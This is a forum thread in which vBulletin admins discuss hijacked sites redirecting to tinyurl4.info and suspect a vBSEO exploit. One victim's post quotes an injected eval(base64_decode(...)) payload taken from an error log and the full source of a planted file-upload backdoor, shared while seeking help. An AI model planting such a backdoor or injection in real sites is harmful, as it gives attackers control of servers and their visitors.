Announcement

Collapse
No announcement yet.

The forum redirect to tinyurl4.info

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • punchbowl
    replied
    Surfing about I noticed multiple vb sites hijacked with this yesterday. I thought I had a virus at first.

    Here's one: www.irishwebmasterforum.com

    Leave a comment:


  • njavan
    replied
    hi
    i find this problem in the data base

    please search tinyurl4 in your data base and delete the url in the data base.

    good Luck

    Leave a comment:


  • njavan
    replied
    No one has solved this problem.?

    Leave a comment:


  • njavan
    replied
    your forum file has been infected.

    search infected links in the template source to secure the forum.

    Leave a comment:


  • Mister Oliver
    replied
    I got an notification from Google Webmaster Tools yesterdat about the malware.

    I just replaced all the vBSEO files with the original ones. I noticed that almost every file on the server in the vBSEO folder was 12 bytes more. That is a bit unusual right?

    I didn't get a virus notification myself with antivirus software so I am installing Microsoft Internet Security right now, or isn't that good antivirus software?

    Leave a comment:


  • njavan
    replied
    please test your site page with Avast Antivirus.

    and report result to me...

    are you sure your site not Infected.?

    Leave a comment:


  • Mister Oliver
    replied
    @njavan

    It couldn't be the last update of vBulletin because I have version 4.0.6 and that is definitely not the latest version.

    Leave a comment:


  • njavan
    replied
    i disable and enable any of plugins ... and this error fix and my forum traffic going up for few hours...

    But this error come back few hours again.!!!!!!!

    Leave a comment:


  • njavan
    replied
    i think this problem refer to lastet VB Update ..!

    VB admin Must resolve this problem and Answer this questions.

    tnx

    Leave a comment:


  • Mister Oliver
    replied
    I got the same problem. I only installed the following plugins:

    1) vBSEO
    2) GlowHost - Spam-O-Matic
    3) Some Chatbox plugin

    My site was redirected to file2store.info from the search results (only the first time that I clicked). I am losing 50% of traffic on the forum.

    Here is another thread about the topic: http://www.vbseo.com/f3/file2store-info-exploit-41890/

    They say that the problem is in vBSEO. Upgrading it will solve the problem.

    I am working on it now, hopefully it is the right solution.

    Leave a comment:


  • njavan
    replied
    hi..

    this error occure for me ..!

    plz helpppppppppp (((((

    Leave a comment:


  • pelicanparts
    replied
    Originally posted by kjpp View Post
    Yes I saw this also on mine sites. But I think this is not resolve exploit problom and it back in future.
    PLEASE POST YOUR PLUG IN LIST ALREADY!!!

    -Wayne

    Leave a comment:


  • kjpp
    replied
    Originally posted by pelicanparts View Post
    I've also noticed that if I disable a plugin, it stops the exploit from happening.

    Thoughts?

    -Wayne
    Yes I saw this also on mine sites. But I think this is not resolve exploit problom and it back in future.

    Leave a comment:


  • pelicanparts
    replied
    Well, there are certainly signs and clues that this is related to the VBSEO exploit that is indicated in the link above. However, none of the rogue plug-ins that were mentioned in the thread exist on my server. I can see the traces of the attack here in my PHP ERROR LOG file:

    PHP ERROR FILE: (I clipped a few lines so as to not provide *too* much information):

    [28-Jan-2012 21:15:25] PHP Parse error: syntax error, unexpected '"', expecting T_STRING in X:\XXXXXXX\shopforum\vbseo\includes\functions_vbseocp_abstract.php(650) : regexp code on line 1

    [28-Jan-2012 21:15:25] PHP Fatal error: preg_replace() [<a href='function.preg-replace'>function.preg-replace</a>]: Failed evaluating code:
    &quot;'&quot;.(($_s = iconv(&quot;UTF-8&quot;, 'ISO-8859-1', &quot;{${eval(base64_decode($_SERVER[\&quot;HTTP_USER_AGENT\&quot;]))}}.{${die()}}&quot) ? $_s : &quot;{${eval(base64_decode($_SERVER[\&quot;HTTP_USER_AGENT\&quot;]))}}.{${die()}}&quot.stripslashes('\'=&gt;') in X:\XXXXXX\shopforum\vbseo\includes\functions_vbseocp_abstract.php on line 650

    In addition, there was a backdoor file that was placed on my server in the root directory called "viewthread.php" This thread contained the following code, and allowed someone to upload a file arbitrarily:

    Code:
    <?php print("Direct Access Not Allowed"); if( $_GET['token'] == "up" ) { echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) {     if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {      echo '<b>O.K</b><br><br>';      }     else {      echo '<b>K.O</b><br><br>';      } } } ?>
    I found this by running a search on my system for any files that were modified or added within the past 30 days.

    BUT, I still haven't found the exact point where the software is referring people now to tinyurl4. I've searched the plugins and templates - it's not there. I've also noticed that if I disable a plugin, it stops the exploit from happening.

    Thoughts?

    -Wayne

    Leave a comment:


  • IBxAnders
    replied
    This may be helpful; they have a diagnostic tool. http://www.vbseo.com/f5/faqs-rogue-p...release-52862/

    Leave a comment:

Related Topics

Collapse

Working...
X